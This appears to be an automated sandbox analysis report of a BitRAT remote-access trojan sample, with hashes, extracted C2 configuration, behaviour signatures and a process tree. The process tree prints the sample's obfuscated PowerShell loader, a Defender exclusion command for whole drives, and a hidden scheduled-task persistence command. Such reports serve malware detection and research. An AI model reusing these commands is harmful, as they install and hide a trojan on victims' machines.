bitrat | c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
23-09-2023 15:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Stub_SC.bat
Size

2.6MB
MD5

12d05ccce56b71317838c1f70c434fdd
SHA1

db2b6548661dc0ad3c19439989e1c36bf62a9ca7
SHA256

c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e
SHA512

79c4c072efba2838d053dd3912484e4138371eac29bd556e344c62abc1b49313bf562fcc6c613c7756c6d24ecc4203336da5aacaf9d4602eb8c5d6caa45053b2
SSDEEP

24576:MFz0PTLOQXlNvJ9ZosU5cqcczDvwcbpSWwHt6H5P+gRnBrqYxvcpXKX6saNpWJcU:bNWTfSWwU8i8esRx7rXDdOuGC+ewAtg

Score

10^/10

bitrat trojan

Malware Config

Extracted

Family

bitrat

Version

1.38

moonli.ddnsking.com:1234

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Stub_SC.bat.exeNetwork42453Man.cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	Stub_SC.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	Network42453Man.cmd.exe

Executes dropped EXE 2 IoCs

Processes:

Stub_SC.bat.exeNetwork42453Man.cmd.exe

pid process

5116 Stub_SC.bat.exe
5028 Network42453Man.cmd.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

Network42453Man.cmd.exe

pid process

5028 Network42453Man.cmd.exe
5028 Network42453Man.cmd.exe
5028 Network42453Man.cmd.exe
5028 Network42453Man.cmd.exe
5028 Network42453Man.cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
5028	Network42453Man.cmd.exe
5028	Network42453Man.cmd.exe
5028	Network42453Man.cmd.exe
5028	Network42453Man.cmd.exe
5028	Network42453Man.cmd.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

Stub_SC.bat.exepowershell.exepowershell.exepowershell.exepowershell.exeNetwork42453Man.cmd.exepowershell.exepowershell.exepowershell.exe

pid	process
5116	Stub_SC.bat.exe
5116	Stub_SC.bat.exe
1644	powershell.exe
1644	powershell.exe
2132	powershell.exe
2132	powershell.exe
1644	powershell.exe
2132	powershell.exe
1644	powershell.exe
1644	powershell.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
2772	powershell.exe
2772	powershell.exe
2772	powershell.exe
5028	Network42453Man.cmd.exe
5028	Network42453Man.cmd.exe
5028	Network42453Man.cmd.exe
2424	powershell.exe
2424	powershell.exe
2168	powershell.exe
2168	powershell.exe
2424	powershell.exe
2168	powershell.exe
2424	powershell.exe
2424	powershell.exe
4876	powershell.exe
4876	powershell.exe
4876	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Stub_SC.bat.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5116	Stub_SC.bat.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeIncreaseQuotaPrivilege	4100	powershell.exe
Token: SeSecurityPrivilege	4100	powershell.exe
Token: SeTakeOwnershipPrivilege	4100	powershell.exe
Token: SeLoadDriverPrivilege	4100	powershell.exe
Token: SeSystemProfilePrivilege	4100	powershell.exe
Token: SeSystemtimePrivilege	4100	powershell.exe
Token: SeProfSingleProcessPrivilege	4100	powershell.exe
Token: SeIncBasePriorityPrivilege	4100	powershell.exe
Token: SeCreatePagefilePrivilege	4100	powershell.exe
Token: SeBackupPrivilege	4100	powershell.exe
Token: SeRestorePrivilege	4100	powershell.exe
Token: SeShutdownPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeSystemEnvironmentPrivilege	4100	powershell.exe
Token: SeRemoteShutdownPrivilege	4100	powershell.exe
Token: SeUndockPrivilege	4100	powershell.exe
Token: SeManageVolumePrivilege	4100	powershell.exe
Token: 33	4100	powershell.exe
Token: 34	4100	powershell.exe
Token: 35	4100	powershell.exe
Token: 36	4100	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeIncreaseQuotaPrivilege	2772	powershell.exe
Token: SeSecurityPrivilege	2772	powershell.exe
Token: SeTakeOwnershipPrivilege	2772	powershell.exe
Token: SeLoadDriverPrivilege	2772	powershell.exe
Token: SeSystemProfilePrivilege	2772	powershell.exe
Token: SeSystemtimePrivilege	2772	powershell.exe
Token: SeProfSingleProcessPrivilege	2772	powershell.exe
Token: SeIncBasePriorityPrivilege	2772	powershell.exe
Token: SeCreatePagefilePrivilege	2772	powershell.exe
Token: SeBackupPrivilege	2772	powershell.exe
Token: SeRestorePrivilege	2772	powershell.exe
Token: SeShutdownPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeSystemEnvironmentPrivilege	2772	powershell.exe
Token: SeRemoteShutdownPrivilege	2772	powershell.exe
Token: SeUndockPrivilege	2772	powershell.exe
Token: SeManageVolumePrivilege	2772	powershell.exe
Token: 33	2772	powershell.exe
Token: 34	2772	powershell.exe
Token: 35	2772	powershell.exe
Token: 36	2772	powershell.exe
Token: SeIncreaseQuotaPrivilege	2772	powershell.exe
Token: SeSecurityPrivilege	2772	powershell.exe
Token: SeTakeOwnershipPrivilege	2772	powershell.exe
Token: SeLoadDriverPrivilege	2772	powershell.exe
Token: SeSystemProfilePrivilege	2772	powershell.exe
Token: SeSystemtimePrivilege	2772	powershell.exe
Token: SeProfSingleProcessPrivilege	2772	powershell.exe
Token: SeIncBasePriorityPrivilege	2772	powershell.exe
Token: SeCreatePagefilePrivilege	2772	powershell.exe
Token: SeBackupPrivilege	2772	powershell.exe
Token: SeRestorePrivilege	2772	powershell.exe
Token: SeShutdownPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeSystemEnvironmentPrivilege	2772	powershell.exe
Token: SeRemoteShutdownPrivilege	2772	powershell.exe
Token: SeUndockPrivilege	2772	powershell.exe
Token: SeManageVolumePrivilege	2772	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Network42453Man.cmd.exe

pid process

5028 Network42453Man.cmd.exe
5028 Network42453Man.cmd.exe

pid	process
5028	Network42453Man.cmd.exe
5028	Network42453Man.cmd.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

cmd.execmd.exeStub_SC.bat.execmd.exeNetwork42453Man.cmd.exe

description	pid	process	target process
PID 4860 wrote to memory of 2032	4860	cmd.exe	cmd.exe
PID 4860 wrote to memory of 2032	4860	cmd.exe	cmd.exe
PID 2032 wrote to memory of 5116	2032	cmd.exe	Stub_SC.bat.exe
PID 2032 wrote to memory of 5116	2032	cmd.exe	Stub_SC.bat.exe
PID 2032 wrote to memory of 5116	2032	cmd.exe	Stub_SC.bat.exe
PID 5116 wrote to memory of 1644	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 1644	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 1644	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 2132	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 2132	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 2132	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 4100	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 4100	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 4100	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 2772	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 2772	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 2772	5116	Stub_SC.bat.exe	powershell.exe
PID 5116 wrote to memory of 4036	5116	Stub_SC.bat.exe	cmd.exe
PID 5116 wrote to memory of 4036	5116	Stub_SC.bat.exe	cmd.exe
PID 5116 wrote to memory of 4036	5116	Stub_SC.bat.exe	cmd.exe
PID 4036 wrote to memory of 5028	4036	cmd.exe	Network42453Man.cmd.exe
PID 4036 wrote to memory of 5028	4036	cmd.exe	Network42453Man.cmd.exe
PID 4036 wrote to memory of 5028	4036	cmd.exe	Network42453Man.cmd.exe
PID 5028 wrote to memory of 2424	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 2424	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 2424	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 2168	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 2168	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 2168	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 4876	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 4876	5028	Network42453Man.cmd.exe	powershell.exe
PID 5028 wrote to memory of 4876	5028	Network42453Man.cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
"C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5116);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Stub_SC')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 42453' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network42453Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Network42453Man.cmd" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4036

C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
"C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe" -w hidden -c $apqR='LMJyQoaMJyQdMJyQ'.Replace('MJyQ', ''),'DecEzhXomEzhXprEzhXeEzhXsEzhXsEzhX'.Replace('EzhX', ''),'FHipDrHipDoHipDmHipDBasHipDe6HipD4SHipDtrHipDingHipD'.Replace('HipD', ''),'ReaGlTbdLiGlTbneGlTbsGlTb'.Replace('GlTb', ''),'CoHbpApHbpAyTHbpAoHbpA'.Replace('HbpA', ''),'MaEheginEhegMoEhegduEheglEhegeEheg'.Replace('Eheg', ''),'TroOznansoOznfooOznroOznmFoOzninaoOznloOznBloOznockoOzn'.Replace('oOzn', ''),'ChSshoanSshogeSshoESshoxSshotSshoeSshonsiSshooSshonSsho'.Replace('Ssho', ''),'EnnHrXtrynHrXPnHrXoinnHrXtnHrX'.Replace('nHrX', ''),'IndGVtvodGVtkedGVt'.Replace('dGVt', ''),'ElSdypemSdypeSdypntSdypAtSdyp'.Replace('Sdyp', ''),'SpuMPtliuMPttuMPt'.Replace('uMPt', ''),'GaSlAeaSlAtaSlACuaSlAraSlAreaSlAntaSlAPaSlAraSlAocaSlAesaSlAsaSlA'.Replace('aSlA', ''),'CrUNafeUNafatUNafeUNafDecUNafryUNafptUNafoUNafrUNaf'.Replace('UNaf', '');function pOCfZ($gekvJ){$BSBXA=[System.Security.Cryptography.Aes]::Create();$BSBXA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BSBXA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BSBXA.Key=[System.Convert]::($apqR[2])('zBdPf8AkDtINuDPE/A2HyG7nwgGIz2wO8zG9RRZ4V9A=');$BSBXA.IV=[System.Convert]::($apqR[2])('xa/+kPbivBu87Qs+xDhCVw==');$JTIYa=$BSBXA.($apqR[13])();$Yaopt=$JTIYa.($apqR[6])($gekvJ,0,$gekvJ.Length);$JTIYa.Dispose();$BSBXA.Dispose();$Yaopt;}function PqvPo($gekvJ){$Pbfvo=New-Object System.IO.MemoryStream(,$gekvJ);$ojhOO=New-Object System.IO.MemoryStream;$Oxkfy=New-Object System.IO.Compression.GZipStream($Pbfvo,[IO.Compression.CompressionMode]::($apqR[1]));$Oxkfy.($apqR[4])($ojhOO);$Oxkfy.Dispose();$Pbfvo.Dispose();$ojhOO.Dispose();$ojhOO.ToArray();}$atogv=[System.Linq.Enumerable]::($apqR[10])([System.IO.File]::($apqR[3])([System.IO.Path]::($apqR[7])([System.Diagnostics.Process]::($apqR[12])().($apqR[5]).FileName, $null)), 1);$MrHap=$atogv.Substring(2).($apqR[11])(':');$llRaa=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[0])));$VSAoW=PqvPo (pOCfZ ([Convert]::($apqR[2])($MrHap[1])));[System.Reflection.Assembly]::($apqR[0])([byte[]]$VSAoW).($apqR[8]).($apqR[9])($null,$null);[System.Reflection.Assembly]::($apqR[0])([byte[]]$llRaa).($apqR[8]).($apqR[9])($null,$null);
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(5028);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network42453Man')
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4876

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f8 0x470
1⤵
PID:3528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
5d9ac231c22e42fd40f790bd5b19be75

SHA1
2c9b7fdc9209f002850c11b29783447c21baf6ae

SHA256
9df1543e3c2493d8e451bf8eda4701962faf71d92091ecdb9c12909074bb9b69

SHA512
0b1b95f1a9b8294a2e5b77e43a752763f1a31cece0be5d792296138803c529f628d7a0afc7b3acf1946b8f9136e6a33f90d3ddcde18186b3c8c196b6173244e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
4b4f864cb334bded90b5576f2b6f1af2

SHA1
c5e3d70abe8816932e487de26856156767ee721a

SHA256
3bff159935740295e57c0af85589978b1aba60cd1ad7021a0bfd49634602bc99

SHA512
bebf7d74bc107b2ef6b96daecc732d17285910e4c27681523eff620f472ce04c386f32eed9fbfba281e0f6eb7887150cedd94d47cc7f612769b371569d713605

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
4b4f864cb334bded90b5576f2b6f1af2

SHA1
c5e3d70abe8816932e487de26856156767ee721a

SHA256
3bff159935740295e57c0af85589978b1aba60cd1ad7021a0bfd49634602bc99

SHA512
bebf7d74bc107b2ef6b96daecc732d17285910e4c27681523eff620f472ce04c386f32eed9fbfba281e0f6eb7887150cedd94d47cc7f612769b371569d713605

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
6c1097b34a29936523316ffe2c89757e

SHA1
4529a305e00ba1a65b52c0c5c99b346f801524d7

SHA256
ad1e130c4081e1eeaf6d44f571374bcec4a297c19610b83da03c27c81d3bb4be

SHA512
715437343d111006a4cad11b5ab2c605f314098350f80b7d804c07e15f529b7f432dd13a4b4b770ac4f74266b470d51c0c132ef698781153c327be86f18ad4f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
af8e112737dca43e5e77c9cff72fce52

SHA1
cbd8db91e11c56f519dddf4610ceadecf1fedbcd

SHA256
708e4fb68d06aedc83035e038467e7c4328d9c719b58e0f75bb70a7a10d6b317

SHA512
b487abd246438cbfc24f1d1256531527671484420b2ebbc2b6bb007c46136ec354393d6b1b45aaf1bc85c7a77f872b7123edeeeb9771ee3d70ad7aa36fe7467b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
e760d67fe4e40d8ef64728b4f20583cb

SHA1
cb27f3d49e91e96c381b81b1d221aa1dfe64f5ff

SHA256
c3a4509f5d48eeda352169eeb1cf58fb6439e2aba2244fe185ad02e1a6b0928a

SHA512
51e165e113fec1dcf4e4b54aa69a0869cafd674d314228095f9c0bc2432612c20911c6d4ad5ea3b053ab46e230943f6ccb2df6e8b4b0059f818b662f1a5501b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stub_SC.bat.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x0nspyph.100.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Network42453Man.cmd
Filesize
2.6MB

MD5
12d05ccce56b71317838c1f70c434fdd

SHA1
db2b6548661dc0ad3c19439989e1c36bf62a9ca7

SHA256
c222b81571013219fd99f7ca5fefa350d6aabd28b03bbc819048a67570db274e

SHA512
79c4c072efba2838d053dd3912484e4138371eac29bd556e344c62abc1b49313bf562fcc6c613c7756c6d24ecc4203336da5aacaf9d4602eb8c5d6caa45053b2

Download Submit
C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\Network42453Man.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
memory/1644-33-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/1644-37-0x0000000003000000-0x0000000003010000-memory.dmp

Filesize
64KB

Download
memory/1644-96-0x0000000003000000-0x0000000003010000-memory.dmp

Filesize
64KB

Download
memory/1644-85-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/1644-163-0x0000000003000000-0x0000000003010000-memory.dmp

Filesize
64KB

Download
memory/1644-167-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/1644-165-0x0000000007F80000-0x0000000008524000-memory.dmp

Filesize
5.6MB

Download
memory/1644-164-0x0000000006C50000-0x0000000006C72000-memory.dmp

Filesize
136KB

Download
memory/2132-71-0x0000000006D70000-0x0000000006E13000-memory.dmp

Filesize
652KB

Download
memory/2132-75-0x00000000070B0000-0x00000000070BE000-memory.dmp

Filesize
56KB

Download
memory/2132-35-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2132-34-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/2132-57-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2132-81-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/2132-60-0x0000000070A50000-0x0000000070A9C000-memory.dmp

Filesize
304KB

Download
memory/2132-59-0x0000000006D30000-0x0000000006D62000-memory.dmp

Filesize
200KB

Download
memory/2132-70-0x0000000006120000-0x000000000613E000-memory.dmp

Filesize
120KB

Download
memory/2132-78-0x00000000071A0000-0x00000000071A8000-memory.dmp

Filesize
32KB

Download
memory/2132-72-0x0000000006EF0000-0x0000000006EFA000-memory.dmp

Filesize
40KB

Download
memory/2132-73-0x0000000007100000-0x0000000007196000-memory.dmp

Filesize
600KB

Download
memory/2132-74-0x0000000007080000-0x0000000007091000-memory.dmp

Filesize
68KB

Download
memory/2132-36-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2132-76-0x00000000070C0000-0x00000000070D4000-memory.dmp

Filesize
80KB

Download
memory/2132-77-0x00000000071C0000-0x00000000071DA000-memory.dmp

Filesize
104KB

Download
memory/2168-183-0x0000000074C30000-0x00000000753E0000-memory.dmp

Filesize
7.7MB

Download
memory/2424-172-0x0000000004D20000-0x0000000004D30000-memory.dmp

Filesize
64KB

Download
